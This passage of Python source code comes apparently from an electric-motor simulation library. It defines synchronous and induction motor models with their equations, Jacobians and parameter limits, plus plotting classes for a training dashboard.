i_sq A Quadrature axis current
i_a A Current through branch a
i_b A Current through branch b
i_c A Current through branch c
i_alpha A Current in alpha axis
i_beta A Current in beta axis
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u_sd V Direct axis voltage
u_sq V Quadrature axis voltage
u_a V Voltage through branch a
u_b V Voltage through branch b
u_c V Voltage through branch c
u_alpha V Voltage in alpha axis
u_beta V Voltage in beta axis
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i General current limit / nominal value
i_a Current in phase a
i_b Current in phase b
i_c Current in phase c
i_alpha Current in alpha axis
i_beta Current in beta axis
i_sd Current in direct axis
i_sq Current in quadrature axis
omega Mechanical angular Velocity
torque Motor generated torque
epsilon Electrical rotational angle
u_a Voltage in phase a
u_b Voltage in phase b
u_c Voltage in phase c
u_alpha Voltage in alpha axis
u_beta Voltage in beta axis
u_sd Voltage in direct axis
u_sq Voltage in quadrature axis
======== ===========================================================
Note:
The voltage limits should be the amplitude of the phase voltage (:math:`\hat{u}_S`).
Typically the rms value for the line voltage (:math:`U_L`) is given.
:math:`\hat{u}_S=\sqrt{2/3}~U_L`
The current limits should be the amplitude of the phase current (:math:`\hat{i}_S`).
Typically the rms value for the phase current (:math:`I_S`) is given.
:math:`\hat{i}_S = \sqrt{2}~I_S`
If not specified, nominal values are equal to their corresponding limit values.
Furthermore, if specific limits/nominal values (e.g. i_a) are not specified they are inferred from
the general limits/nominal values (e.g. i)
"""
#### Parameters taken from DOI: 10.1109/TPEL.2020.3006779 (<NAME>, <NAME>, <NAME>, <NAME>)
#### and DOI: 10.1109/IEMDC.2019.8785122 (<NAME>, <NAME>, <NAME>)
_default_motor_parameter = {
'p': 3,
'l_d': 0.37e-3,
'l_q': 1.2e-3,
'j_rotor': 0.3883,
'r_s': 18e-3,
'psi_p': 66e-3,
}
HAS_JACOBIAN = True
_default_limits = dict(omega=12e3 * np.pi / 30, torque=0.0, i=260, epsilon=math.pi, u=300)
_default_nominal_values = dict(omega=3e3 * np.pi / 30, torque=0.0, i=240, epsilon=math.pi, u=300)
_default_initializer = {'states': {'i_sq': 0.0, 'i_sd': 0.0, 'epsilon': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
IO_VOLTAGES = ['u_a', 'u_b', 'u_c', 'u_sd', 'u_sq']
IO_CURRENTS = ['i_a', 'i_b', 'i_c', 'i_sd', 'i_sq']
def _update_model(self):
# Docstring of superclass
mp = self._motor_parameter
self._model_constants = np.array([
# omega, i_d, i_q, u_d, u_q, omega * i_d, omega * i_q
[ 0, -mp['r_s'], 0, 1, 0, 0, mp['l_q'] * mp['p']],
[-mp['psi_p'] * mp['p'], 0, -mp['r_s'], 0, 1, -mp['l_d'] * mp['p'], 0],
[ mp['p'], 0, 0, 0, 0, 0, 0],
])
self._model_constants[self.I_SD_IDX] = self._model_constants[self.I_SD_IDX] / mp['l_d']
self._model_constants[self.I_SQ_IDX] = self._model_constants[self.I_SQ_IDX] / mp['l_q']
def _torque_limit(self):
# Docstring of superclass
mp = self._motor_parameter
if mp['l_d'] == mp['l_q']:
return self.torque([0, self._limits['i_sq'], 0])
else:
i_n = self.nominal_values['i']
_p = mp['psi_p'] / (2 * (mp['l_d'] - mp['l_q']))
_q = - i_n ** 2 / 2
i_d_opt = - _p / 2 - np.sqrt( (_p / 2) ** 2 - _q)
i_q_opt = np.sqrt(i_n ** 2 - i_d_opt ** 2)
return self.torque([i_d_opt, i_q_opt, 0])
def torque(self, currents):
# Docstring of superclass
mp = self._motor_parameter
return 1.5 * mp['p'] * (mp['psi_p'] + (mp['l_d'] - mp['l_q']) * currents[self.I_SD_IDX]) * currents[self.I_SQ_IDX]
def electrical_jacobian(self, state, u_in, omega, *args):
mp = self._motor_parameter
return (
np.array([ # dx'/dx
[-mp['r_s'] / mp['l_d'], mp['l_q']/mp['l_d'] * omega * mp['p'], 0],
[-mp['l_d'] / mp['l_q'] * omega * mp['p'], - mp['r_s'] / mp['l_q'], 0],
[0, 0, 0]
]),
np.array([ # dx'/dw
mp['p'] * mp['l_q'] / mp['l_d'] * state[self.I_SQ_IDX],
- mp['p'] * mp['l_d'] / mp['l_q'] * state[self.I_SD_IDX] - mp['p'] * mp['psi_p'] / mp['l_q'],
mp['p']
]),
np.array([ # dT/dx
1.5 * mp['p'] * (mp['l_d'] - mp['l_q']) * state[self.I_SQ_IDX],
1.5 * mp['p'] * (mp['psi_p'] + (mp['l_d'] - mp['l_q']) * state[self.I_SD_IDX]),
0
])
)
class InductionMotor(ThreePhaseMotor):
"""
The InductionMotor and its subclasses implement the technical system of a three phase induction motor.
This includes the system equations, the motor parameters of the equivalent circuit diagram,
as well as limits and bandwidth.
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_s Ohm 2.9338 Stator resistance
r_r Ohm 1.355 Rotor resistance
l_m H 143.75e-3 Main inductance
l_sigs H 5.87e-3 Stator-side stray inductance
l_sigr H 5.87e-3 Rotor-side stray inductance
p 1 2 Pole pair number
j_rotor kg/m^2 0.0011 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i_sd A Direct axis current
i_sq A Quadrature axis current
i_sa A Current through branch a
i_sb A Current through branch b
i_sc A Current through branch c
i_salpha A Current in alpha axis
i_sbeta A Current in beta axis
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u_sd V Direct axis voltage
u_sq V Quadrature axis voltage
u_sa V Voltage through branch a
u_sb V Voltage through branch b
u_sc V Voltage through branch c
u_salpha V Voltage in alpha axis
u_sbeta V Voltage in beta axis
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i General current limit / nominal value
i_sa Current in phase a
i_sb Current in phase b
i_sc Current in phase c
i_salpha Current in alpha axis
i_sbeta Current in beta axis
i_sd Current in direct axis
i_sq Current in quadrature axis
omega Mechanical angular Velocity
torque Motor generated torque
u_sa Voltage in phase a
u_sb Voltage in phase b
u_sc Voltage in phase c
u_salpha Voltage in alpha axis
u_sbeta Voltage in beta axis
u_sd Voltage in direct axis
u_sq Voltage in quadrature axis
======== ===========================================================
Note:
The voltage limits should be the amplitude of the phase voltage (:math:`\hat{u}_S`).
Typically the rms value for the line voltage (:math:`U_L`) is given.
:math:`\hat{u}_S=\sqrt{2/3}~U_L`
The current limits should be the amplitude of the phase current (:math:`\hat{i}_S`).
Typically the rms value for the phase current (:math:`I_S`) is given.
:math:`\hat{i}_S = \sqrt{2}~I_S`
If not specified, nominal values are equal to their corresponding limit values.
Furthermore, if specific limits/nominal values (e.g. i_a) are not specified they are inferred from
the general limits/nominal values (e.g. i)
"""
I_SALPHA_IDX = 0
I_SBETA_IDX = 1
PSI_RALPHA_IDX = 2
PSI_RBETA_IDX = 3
EPSILON_IDX = 4
CURRENTS_IDX = [0, 1]
FLUX_IDX = [2, 3]
CURRENTS = ['i_salpha', 'i_sbeta']
FLUXES = ['psi_ralpha', 'psi_rbeta']
STATOR_VOLTAGES = ['u_salpha', 'u_sbeta']
IO_VOLTAGES = ['u_sa', 'u_sb', 'u_sc', 'u_salpha', 'u_sbeta', 'u_sd',
'u_sq']
IO_CURRENTS = ['i_sa', 'i_sb', 'i_sc', 'i_salpha', 'i_sbeta', 'i_sd',
'i_sq']
HAS_JACOBIAN = True
#### Parameters taken from DOI: 10.1109/EPEPEMC.2018.8522008 (<NAME>, <NAME>, <NAME>)
_default_motor_parameter = {
'p': 2,
'l_m': 143.75e-3,
'l_sigs': 5.87e-3,
'l_sigr': 5.87e-3,
'j_rotor': 1.1e-3,
'r_s': 2.9338,
'r_r': 1.355,
}
_default_limits = dict(omega=4e3 * np.pi / 30, torque=0.0, i=5.5, epsilon=math.pi, u=560)
_default_nominal_values = dict(omega=3e3 * np.pi / 30, torque=0.0, i=3.9, epsilon=math.pi, u=560)
_model_constants = None
_default_initializer = {'states': {'i_salpha': 0.0, 'i_sbeta': 0.0,
'psi_ralpha': 0.0, 'psi_rbeta': 0.0,
'epsilon': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
_initializer = None
@property
def motor_parameter(self):
# Docstring of superclass
return self._motor_parameter
@property
def initializer(self):
# Docstring of superclass
return self._initializer
def __init__(self, motor_parameter=None, nominal_values=None,
limit_values=None, motor_initializer=None, initial_limits=None,
**__):
# Docstring of superclass
# convert placeholder i and u to actual IO quantities
_nominal_values = self._default_nominal_values.copy()
_nominal_values.update({u: _nominal_values['u'] for u in self.IO_VOLTAGES})
_nominal_values.update({i: _nominal_values['i'] for i in self.IO_CURRENTS})
del _nominal_values['u'], _nominal_values['i']
_nominal_values.update(nominal_values or {})
# same for limits
_limit_values = self._default_limits.copy()
_limit_values.update({u: _limit_values['u'] for u in self.IO_VOLTAGES})
_limit_values.update({i: _limit_values['i'] for i in self.IO_CURRENTS})
del _limit_values['u'], _limit_values['i']
_limit_values.update(limit_values or {})
super().__init__(motor_parameter, nominal_values,
limit_values, motor_initializer, initial_limits)
self._update_model()
self._update_limits(_limit_values, _nominal_values)
def reset(self,
state_space,
state_positions,
omega=None):
# Docstring of superclass
if self._initializer and self._initializer['states']:
self._update_initial_limits(omega=omega)
self.initialize(state_space, state_positions)
return np.asarray(list(self._initial_states.values()))
else:
return np.zeros(len(self.CURRENTS) + len(self.FLUXES) + 1)
def electrical_ode(self, state, u_sr_alphabeta, omega, *args):
"""
The differential equation of the Induction Motor.
Args:
state: The momentary state of the motor. [i_salpha, i_sbeta, psi_ralpha, psi_rbeta, epsilon]
omega: The mechanical load
u_sr_alphabeta: The input voltages [u_salpha, u_sbeta, u_ralpha, u_rbeta]
Returns:
The derivatives of the state vector d/dt( [i_salpha, i_sbeta, psi_ralpha, psi_rbeta, epsilon])
"""
return np.matmul(self._model_constants, np.array([
# omega, i_alpha, i_beta, psi_ralpha, psi_rbeta, omega * psi_ralpha, omega * psi_rbeta, u_salpha, u_sbeta, u_ralpha, u_rbeta,
omega,
state[self.I_SALPHA_IDX],
state[self.I_SBETA_IDX],
state[self.PSI_RALPHA_IDX],
state[self.PSI_RBETA_IDX],
omega * state[self.PSI_RALPHA_IDX],
omega * state[self.PSI_RBETA_IDX],
u_sr_alphabeta[0, 0],
u_sr_alphabeta[0, 1],
u_sr_alphabeta[1, 0],
u_sr_alphabeta[1, 1],
]))
def i_in(self, state):
# Docstring of superclass
return state[self.CURRENTS_IDX]
def _torque_limit(self):
# Docstring of superclass
mp = self._motor_parameter
return 1.5 * mp['p'] * mp['l_m'] ** 2/(mp['l_m']+mp['l_sigr']) * self._limits['i_sd'] * self._limits['i_sq'] / 2
def torque(self, states):
# Docstring of superclass
mp = self._motor_parameter
return 1.5 * mp['p'] * mp['l_m']/(mp['l_m'] + mp['l_sigr']) * (states[self.PSI_RALPHA_IDX] * states[self.I_SBETA_IDX] - states[self.PSI_RBETA_IDX] * states[self.I_SALPHA_IDX])
def _flux_limit(self, omega=0, eps_mag=0, u_q_max=0.0, u_rq_max=0.0):
"""
Calculate Flux limits for given current and magnetic-field angle
Args:
omega(float): speed given by mechanical load
eps_mag(float): magnetic field angle
u_q_max(float): maximal strator voltage in q-system
u_rq_max(float): maximal rotor voltage in q-system
returns:
maximal flux values(list) in alpha-beta-system
"""
mp = self.motor_parameter
l_s = mp['l_m'] + mp['l_sigs']
l_r = mp['l_m'] + mp['l_sigr']
l_mr = mp['l_m'] / l_r
sigma = (l_s * l_r - mp['l_m'] ** 2) / (l_s * l_r)
# limiting flux for a low omega
if omega == 0:
psi_d_max = mp['l_m'] * self._nominal_values['i_sd']
else:
i_d, i_q = self.q_inv([self._initial_states['i_salpha'],
self._initial_states['i_sbeta']],
eps_mag)
psi_d_max = mp['p'] * omega * sigma * l_s * i_d + \
(mp['r_s'] + mp['r_r'] * l_mr**2) * i_q + \
u_q_max + \
l_mr * u_rq_max
psi_d_max /= - mp['p'] * omega * l_mr
# clipping flux and setting nominal limit
psi_d_max = 0.9 * np.clip(psi_d_max, a_min=0, a_max=np.abs(mp['l_m'] * i_d))
# returning flux in alpha, beta system
return self.q([psi_d_max, 0], eps_mag)
def _update_model(self):
# Docstring of superclass
mp = self._motor_parameter
l_s = mp['l_m']+mp['l_sigs']
l_r = mp['l_m']+mp['l_sigr']
sigma = (l_s*l_r-mp['l_m']**2) /(l_s*l_r)
tau_r = l_r / mp['r_r']
tau_sig = sigma * l_s / (
mp['r_s'] + mp['r_r'] * (mp['l_m'] ** 2) / (l_r ** 2))
self._model_constants = np.array([
# omega, i_alpha, i_beta, psi_ralpha, psi_rbeta, omega * psi_ralpha, omega * psi_rbeta, u_salpha, u_sbeta, u_ralpha, u_rbeta,
[0, -1 / tau_sig, 0,mp['l_m'] * mp['r_r'] / (sigma * l_s * l_r ** 2), 0, 0,
+mp['l_m'] * mp['p'] / (sigma * l_r * l_s), 1 / (sigma * l_s), 0,
-mp['l_m'] / (sigma * l_r * l_s), 0, ], # i_ralpha_dot
[0, 0, -1 / tau_sig, 0,
mp['l_m'] * mp['r_r'] / (sigma * l_s * l_r ** 2),
-mp['l_m'] * mp['p'] / (sigma * l_r * l_s), 0, 0,
1 / (sigma * l_s), 0, -mp['l_m'] / (sigma * l_r * l_s), ],
# i_rbeta_dot
[0, mp['l_m'] / tau_r, 0, -1 / tau_r, 0, 0, -mp['p'], 0, 0, 1,
0, ], # psi_ralpha_dot
[0, 0, mp['l_m'] / tau_r, 0, -1 / tau_r, mp['p'], 0, 0, 0, 0, 1, ],
# psi_rbeta_dot
[mp['p'], 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ], # epsilon_dot
])
def electrical_jacobian(self, state, u_in, omega, *args):
mp = self._motor_parameter
l_s = mp['l_m'] + mp['l_sigs']
l_r = mp['l_m'] + mp['l_sigr']
sigma = (l_s * l_r - mp['l_m'] ** 2) / (l_s * l_r)
tau_r = l_r / mp['r_r']
tau_sig = sigma * l_s / (
mp['r_s'] + mp['r_r'] * (mp['l_m'] ** 2) / (l_r ** 2))
return (
np.array([ # dx'/dx
# i_alpha i_beta psi_alpha psi_beta epsilon
[-1 / tau_sig, 0,
mp['l_m'] * mp['r_r'] / (sigma * l_s * l_r ** 2),
omega * mp['l_m'] * mp['p'] / (sigma * l_r * l_s), 0],
[0, - 1 / tau_sig,
- omega * mp['l_m'] * mp['p'] / (sigma * l_r * l_s),
mp['l_m'] * mp['r_r'] / (sigma * l_s * l_r ** 2), 0],
[mp['l_m'] / tau_r, 0, - 1 / tau_r, - omega * mp['p'], 0],
[0, mp['l_m'] / tau_r, omega * mp['p'], - 1 / tau_r, 0],
[0, 0, 0, 0, 0]
]),
np.array([ # dx'/dw
mp['l_m'] * mp['p'] / (sigma * l_r * l_s) * state[
self.PSI_RBETA_IDX],
- mp['l_m'] * mp['p'] / (sigma * l_r * l_s) * state[
self.PSI_RALPHA_IDX],
- mp['p'] * state[self.PSI_RBETA_IDX],
mp['p'] * state[self.PSI_RALPHA_IDX],
mp['p']
]),
np.array([ # dT/dx
- state[self.PSI_RBETA_IDX] * 3 / 2 * mp['p'] * mp[
'l_m'] / l_r,
state[self.PSI_RALPHA_IDX] * 3 / 2 * mp['p'] * mp['l_m'] / l_r,
state[self.I_SBETA_IDX] * 3 / 2 * mp['p'] * mp['l_m'] / l_r,
- state[self.I_SALPHA_IDX] * 3 / 2 * mp['p'] * mp['l_m'] / l_r,
0
])
)
class SquirrelCageInductionMotor(InductionMotor):
"""
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_s Ohm 2.9338 Stator resistance
r_r Ohm 1.355 Rotor resistance
l_m H 143.75e-3 Main inductance
l_sigs H 5.87e-3 Stator-side stray inductance
l_sigr H 5.87e-3 Rotor-side stray inductance
p 1 2 Pole pair number
j_rotor kg/m^2 0.0011 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i_sd A Direct axis current
i_sq A Quadrature axis current
i_sa A Stator current through branch a
i_sb A Stator current through branch b
i_sc A Stator current through branch c
i_salpha A Stator current in alpha direction
i_sbeta A Stator current in beta direction
=============== ====== =============================================
=============== ====== =============================================
Rotor flux Unit Description
=============== ====== =============================================
psi_rd Vs Direct axis of the rotor oriented flux
psi_rq Vs Quadrature axis of the rotor oriented flux
psi_ra Vs Rotor oriented flux in branch a
psi_rb Vs Rotor oriented flux in branch b
psi_rc Vs Rotor oriented flux in branch c
psi_ralpha Vs Rotor oriented flux in alpha direction
psi_rbeta Vs Rotor oriented flux in beta direction
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u_sd V Direct axis voltage
u_sq V Quadrature axis voltage
u_sa V Stator voltage through branch a
u_sb V Stator voltage through branch b
u_sc V Stator voltage through branch c
u_salpha V Stator voltage in alpha axis
u_sbeta V Stator voltage in beta axis
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i General current limit / nominal value
i_sa Current in phase a
i_sb Current in phase b
i_sc Current in phase c
i_salpha Current in alpha axis
i_sbeta Current in beta axis
i_sd Current in direct axis
i_sq Current in quadrature axis
omega Mechanical angular Velocity
torque Motor generated torque
u_sa Voltage in phase a
u_sb Voltage in phase b
u_sc Voltage in phase c
u_salpha Voltage in alpha axis
u_sbeta Voltage in beta axis
u_sd Voltage in direct axis
u_sq Voltage in quadrature axis
======== ===========================================================
Note:
The voltage limits should be the amplitude of the phase voltage (:math:`\hat{u}_S`).
Typically the rms value for the line voltage (:math:`U_L`) is given.
:math:`\hat{u}_S=\sqrt{2/3}~U_L`
The current limits should be the amplitude of the phase current (:math:`\hat{i}_S`).
Typically the rms value for the phase current (:math:`I_S`) is given.
:math:`\hat{i}_S = \sqrt{2}~I_S`
If not specified, nominal values are equal to their corresponding limit values.
Furthermore, if specific limits/nominal values (e.g. i_a) are not specified they are inferred from
the general limits/nominal values (e.g. i)
"""
#### Parameters taken from DOI: 10.1109/EPEPEMC.2018.8522008 (<NAME>, <NAME>, <NAME>)
_default_motor_parameter = {
'p': 2,
'l_m': 143.75e-3,
'l_sigs': 5.87e-3,
'l_sigr': 5.87e-3,
'j_rotor': 1.1e-3,
'r_s': 2.9338,
'r_r': 1.355,
}
_default_limits = dict(omega=4e3 * np.pi / 30, torque=0.0, i=5.5, epsilon=math.pi, u=560)
_default_nominal_values = dict(omega=3e3 * np.pi / 30, torque=0.0, i=3.9, epsilon=math.pi, u=560)
_default_initializer = {'states': {'i_salpha': 0.0, 'i_sbeta': 0.0,
'psi_ralpha': 0.0, 'psi_rbeta': 0.0,
'epsilon': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
def electrical_ode(self, state, u_salphabeta, omega, *args):
"""
The differential equation of the SCIM.
Sets u_ralpha = u_rbeta = 0 before calling the respective super function.
"""
u_ralphabeta = np.zeros_like(u_salphabeta)
u_sr_aphabeta = np.array([u_salphabeta, u_ralphabeta])
return super().electrical_ode(state, u_sr_aphabeta, omega, *args)
def _update_limits(self, limit_values={}, nominal_values={}):
# Docstring of superclass
voltage_limit = 0.5 * self._limits['u']
voltage_nominal = 0.5 * self._nominal_values['u']
limits_agenda = {}
nominal_agenda = {}
for u, i in zip(self.IO_VOLTAGES, self.IO_CURRENTS):
limits_agenda[u] = voltage_limit
nominal_agenda[u] = voltage_nominal
limits_agenda[i] = self._limits.get('i', None) or \
self._limits[u] / self._motor_parameter['r_s']
nominal_agenda[i] = self._nominal_values.get('i', None) or \
self._nominal_values[u] / self._motor_parameter['r_s']
super()._update_limits(limits_agenda, nominal_agenda)
def _update_initial_limits(self, nominal_new={}, omega=None):
# Docstring of superclass
# draw a sample magnetic field angle from [-pi,pi]
eps_mag = 2 * np.pi * np.random.random_sample() - np.pi
flux_alphabeta_limits = self._flux_limit(omega=omega,
eps_mag=eps_mag,
u_q_max=self._nominal_values['u_sq'])
# using absolute value, because limits should describe upper limit
# after abs-operator, norm of alphabeta flux still equal to
# d-component of flux
flux_alphabeta_limits = np.abs(flux_alphabeta_limits)
flux_nominal_limits = {state: value for state, value in
zip(self.FLUXES, flux_alphabeta_limits)}
flux_nominal_limits.update(nominal_new)
super()._update_initial_limits(flux_nominal_limits)
class DoublyFedInductionMotor(InductionMotor):
"""
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_s Ohm 12e-3 Stator resistance
r_r Ohm 21e-3 Rotor resistance
l_m H 13.5e-3 Main inductance
l_sigs H 0.2e-3 Stator-side stray inductance
l_sigr H 0.1e-3 Rotor-side stray inductance
p 1 2 Pole pair number
j_rotor kg/m^2 1e3 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i_sd A Direct axis current
i_sq A Quadrature axis current
i_sa A Current through branch a
i_sb A Current through branch b
i_sc A Current through branch c
i_salpha A Current in alpha axis
i_sbeta A Current in beta axis
=============== ====== =============================================
=============== ====== =============================================
Rotor flux Unit Description
=============== ====== =============================================
psi_rd Vs Direct axis of the rotor oriented flux
psi_rq Vs Quadrature axis of the rotor oriented flux
psi_ra Vs Rotor oriented flux in branch a
psi_rb Vs Rotor oriented flux in branch b
psi_rc Vs Rotor oriented flux in branch c
psi_ralpha Vs Rotor oriented flux in alpha direction
psi_rbeta Vs Rotor oriented flux in beta direction
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u_sd V Direct axis voltage
u_sq V Quadrature axis voltage
u_sa V Stator voltage through branch a
u_sb V Stator voltage through branch b
u_sc V Stator voltage through branch c
u_salpha V Stator voltage in alpha axis
u_sbeta V Stator voltage in beta axis
u_ralpha V Rotor voltage in alpha axis
u_rbeta V Rotor voltage in beta axis
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i General current limit / nominal value
i_sa Current in phase a
i_sb Current in phase b
i_sc Current in phase c
i_salpha Current in alpha axis
i_sbeta Current in beta axis
i_sd Current in direct axis
i_sq Current in quadrature axis
omega Mechanical angular Velocity
torque Motor generated torque
u_sa Voltage in phase a
u_sb Voltage in phase b
u_sc Voltage in phase c
u_salpha Voltage in alpha axis
u_sbeta Voltage in beta axis
u_sd Voltage in direct axis
u_sq Voltage in quadrature axis
u_ralpha Rotor voltage in alpha axis
u_rbeta Rotor voltage in beta axis
======== ===========================================================
Note:
The voltage limits should be the amplitude of the phase voltage (:math:`\hat{u}_S`).
Typically the rms value for the line voltage (:math:`U_L`) is given.
:math:`\hat{u}_S=\sqrt{2/3}~U_L`
The current limits should be the amplitude of the phase current (:math:`\hat{i}_S`).
Typically the rms value for the phase current (:math:`I_S`) is given.
:math:`\hat{i}_S = \sqrt{2}~I_S`
If not specified, nominal values are equal to their corresponding limit values.
Furthermore, if specific limits/nominal values (e.g. i_a) are not specified they are inferred from
the general limits/nominal values (e.g. i)
"""
ROTOR_VOLTAGES = ['u_ralpha', 'u_rbeta']
ROTOR_CURRENTS = ['i_ralpha', 'i_rbeta']
IO_ROTOR_VOLTAGES = ['u_ra', 'u_rb', 'u_rc', 'u_rd', 'u_rq']
IO_ROTOR_CURRENTS = ['i_ra', 'i_rb', 'i_rc', 'i_rd', 'i_rq']
#### Parameters taken from DOI: 10.1016/j.jestch.2016.01.015 (<NAME>, <NAME>, <NAME>)
_default_motor_parameter = {
'p': 2,
'l_m': 297.5e-3,
'l_sigs': 25.71e-3,
'l_sigr': 25.71e-3,
'j_rotor': 13.695e-3,
'r_s': 4.42,
'r_r': 3.51,
}
_default_limits = dict(omega=1800 * np.pi / 30, torque=0.0, i=9, epsilon=math.pi, u=720)
_default_nominal_values = dict(omega=1650 * np.pi / 30, torque=0.0, i=7.5, epsilon=math.pi, u=720)
_default_initializer = {'states': {'i_salpha': 0.0, 'i_sbeta': 0.0,
'psi_ralpha': 0.0, 'psi_rbeta': 0.0,
'epsilon': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
def __init__(self, **kwargs):
self.IO_VOLTAGES += self.IO_ROTOR_VOLTAGES
self.IO_CURRENTS += self.IO_ROTOR_CURRENTS
super().__init__(**kwargs)
def _update_limits(self, limit_values={}, nominal_values={}):
# Docstring of superclass
voltage_limit = 0.5 * self._limits['u']
voltage_nominal = 0.5 * self._nominal_values['u']
limits_agenda = {}
nominal_agenda = {}
for u, i in zip(self.IO_VOLTAGES+self.ROTOR_VOLTAGES,
self.IO_CURRENTS+self.ROTOR_CURRENTS):
limits_agenda[u] = voltage_limit
nominal_agenda[u] = voltage_nominal
limits_agenda[i] = self._limits.get('i', None) or \
self._limits[u] / self._motor_parameter['r_r']
nominal_agenda[i] = self._nominal_values.get('i', None) or \
self._nominal_values[u] / \
self._motor_parameter['r_r']
super()._update_limits(limits_agenda, nominal_agenda)
def _update_initial_limits(self, nominal_new={}, omega=None):
# Docstring of superclass
# draw a sample magnetic field angle from [-pi,pi]
eps_mag = 2 * np.pi * np.random.random_sample() - np.pi
flux_alphabeta_limits = self._flux_limit(omega=omega,
eps_mag=eps_mag,
u_q_max=self._nominal_values['u_sq'],
u_rq_max=self._nominal_values['u_rq'])
flux_nominal_limits = {state: value for state, value in
zip(self.FLUXES, flux_alphabeta_limits)}
super()._update_initial_limits(flux_nominal_limits)
```
#### File: visualization/motor_dashboard_plots/episode_length_plot.py
```python
from .base_plots import EpisodePlot
class EpisodeLengthPlot(EpisodePlot):
"""Plot to display the lengths of all episodes."""
def __init__(self):
super().__init__()
# data container for episode lengths
self._episode_lengths = []
self._episode_length = 0
self._episode_no = 0
self._label = 'Episode Length'
self._axis = None
# Flag, that is true, if an episode has ended before the rendering.
self._reset = False
self._y_data.append(self._episode_lengths)
def initialize(self, axis):
"""
Args:
axis (object): the subplot axis for plotting the action variable
"""
super().initialize(axis)
self._lines.append(self._axis.plot([], self._episode_lengths, color=self._colors[0]))
def on_step_end(self, k, state, reference, reward, done):
self._episode_length = k
def _set_y_data(self):
self._episode_lengths.append(self._episode_length)
self._episode_length = 0
```
#### File: visualization/motor_dashboard_plots/reward_plot.py
```python
import numpy as np
from .base_plots import TimePlot
class RewardPlot(TimePlot):
"""Plot to display the instantaneous reward during the episode"""
def __init__(self):
super().__init__()
self._reward_range = None
self._reward_line = None
self._reward_data = None
self._reward_line_cfg = self._default_time_line_cfg.copy()
self._reward_line_cfg['color'] = self._colors[-1]
def initialize(self, axis):
super().initialize(axis)
self._reward_line, = self._axis.plot(self._x_data, self._reward_data, **self._reward_line_cfg)
self._lines.append(self._reward_line)
def set_env(self, env):
super().set_env(env)
self._reward_range = env.reward_range
self._reward_data = np.zeros_like(self._x_data, dtype=float) * np.nan
self._y_data = [self._reward_data]
min_limit = self._reward_range[0]
max_limit = self._reward_range[1]
spacing = 0.1 * (max_limit - min_limit)
self._y_lim = (min_limit - spacing, max_limit + spacing)
self._label = 'reward'
def on_step_end(self, k, state, reference, reward, done):
idx = self.data_idx
self._x_data[idx] = self._t
self._reward_data[idx] = reward
super().on_step_end(k, state, reference, reward, done)
```
#### File: visualization/motor_dashboard_plots/state_plot.py
```python
import numpy as np
from .base_plots import TimePlot
class StatePlot(TimePlot):
"""Plot to display the environments states and their references."""
_default_limit_line_cfg = {
'color': 'red',
'linestyle': '--',
'linewidth': 1
}
# Labels for each state variable.
state_labels = {
'omega': r'$\omega$/(1/s)',
'torque': '$T$/Nm',
'i': '$i$/A',
'i_a': '$i_{a}$/A',
'i_e': '$i_{e}$/A',
'i_b': '$i_{b}$/A',
'i_c': '$i_{c}$/A',
'i_sq': '$i_{sq}$/A',
'i_sd': '$i_{sd}$/A',
'u': '$u$/V',
'u_a': '$u_{a}$/V',
'u_b': '$u_{b}$/V',
'u_c': '$u_{c}$/V',
'u_sq': '$u_{sq}$/V',
'u_sd': '$u_{sd}$/V',
'u_e': '$u_{e}$/V',
'u_sup': '$u_{sup}$/V',
'epsilon': r'$\epsilon$/rad'
}
def __init__(self, state):
"""
Args:
state(str): Name of the state to plot
"""
super().__init__()
self._state_line_config = self._default_time_line_cfg.copy()
self._ref_line_config = self._default_time_line_cfg.copy()
self._limit_line_config = self._default_limit_line_cfg.copy()
#: State space of the plotted variable
self._state_space = None
#: State name of the plotted variable
self._state = state
#: Index in the state array of the plotted variable
self._state_idx = None
#: Maximal value of the plotted variable
self._limits = None
# Bool: Flag if the plotted variable is referenced.
self._referenced = None
# matplotlib-Lines for the state and reference
self._state_line = None
self._reference_line = None
# Data containers
self._state_data = []
self._ref_data = []
# Flag, if the passed data is normalized
self._normalized = True
def set_env(self, env):
# Docstring of superclass
super().set_env(env)
ps = env.physical_system
rg = env.reference_generator
# Save the index of the state.
self._state_idx = ps.state_positions[self._state]
# The maximal values of the state.
self._limits = ps.limits[self._state_idx]
self._state_space = ps.state_space.low[self._state_idx], ps.state_space.high[self._state_idx]
# Bool: if the state is referenced.
self._referenced = rg.referenced_states[self._state_idx]
# Bool: if the data is already normalized to an interval of [-1, 1]
self._normalized = self._limits != self._state_space[1]
# Initialize the data containers
self._state_data = np.ones(self._x_width) * np.nan
self._ref_data = np.ones(self._x_width) * np.nan
min_limit = self._limits * self._state_space[0] if self._normalized else self._state_space[0]
max_limit = self._limits * self._state_space[1] if self._normalized else self._state_space[1]
spacing = 0.1 * (max_limit - min_limit)
# Set the y-axis limits to fixed initital values
self._y_lim = (min_limit - spacing, max_limit + spacing)
# Set the y-axis label
